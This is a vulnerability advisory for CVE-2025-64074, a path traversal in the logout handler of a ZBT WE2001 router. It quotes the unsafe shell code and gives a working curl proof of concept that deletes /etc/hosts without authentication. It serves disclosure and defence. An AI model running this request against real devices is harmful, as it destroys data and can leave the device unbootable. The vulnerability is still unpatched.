Neutrino Security

Arbitrary file deletion via logout function

CVE ID CVE-2025-64074 CVSS N/A
CWE CWE-22 AFFECTED COMPONENT logout function
PRODUCT WE2001 VERSION V23.09.27
EXPLOITABILITY Remote, unauthenticated IMPACT Arbitraty file deletion

Summary

A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.

Details

The vulnerability exists in the logout operation within the webapi shell script. The application uses the access_token parameter to construct a file path for deletion without proper validation or sanitization.

The following webapi code extract demonstrates how the user input FORM_access_token (access_token) is directly concatenated into the rm command:

if [ "$op" == "logout" ];then
	if [ -n "$FORM_access_token" ];then
		rm /tmp/webapi_token/session/${FORM_access_token}
	fi

	json_init
	json_add_string code "1"
	json_add_string reason "success"

	echo -n "$(json_dump)"
fi

The script intends to delete a session file located inside /tmp/webapi_token/session/. However, because the rm command accepts the ${FORM_access_token} variable without filtering for directory traversal characters, an attacker can manipulate the path to point to any file on the system.

Prerequisites: For the traversal to successfully step out of the directory tree, the base path /tmp/webapi_token/session/ must exist. In a default installation, this directory is automatically created when at least one valid session is active. Therefore, the vulnerability relies on the presence of this temporary directory structure to serve as a pivot point.

PoC

To reproduce this vulnerability, an attacker can send a crafted HTTP request simply using curl.

In this case the payload uses path traversal sequences to traverse up from the session directory to the root directory and delete the /etc/hosts file.

PATH_TO_FILE="/etc/hosts"; 

curl --path-as-is -k "http://192.168.1.1/cgi-bin/webapi?op=logout&access_token=../../..${PATH_TO_FILE}"

Impact

Attackers can arbitrarily delete critical application data, configuration files, or even system binaries and boot configurations. This action can render the device completely unbootable, resulting in a Permanent Denial of Service.

Remiediation

At the time of this publication, there is no official patch or remediation available from the vendor.

Disclosure Timeline

Date Event
2025-10-23 Initial report sent to MITRE.
2025-11-12 CVE ID reserved/assigned by MITRE.
2026-02-11 Public disclosure.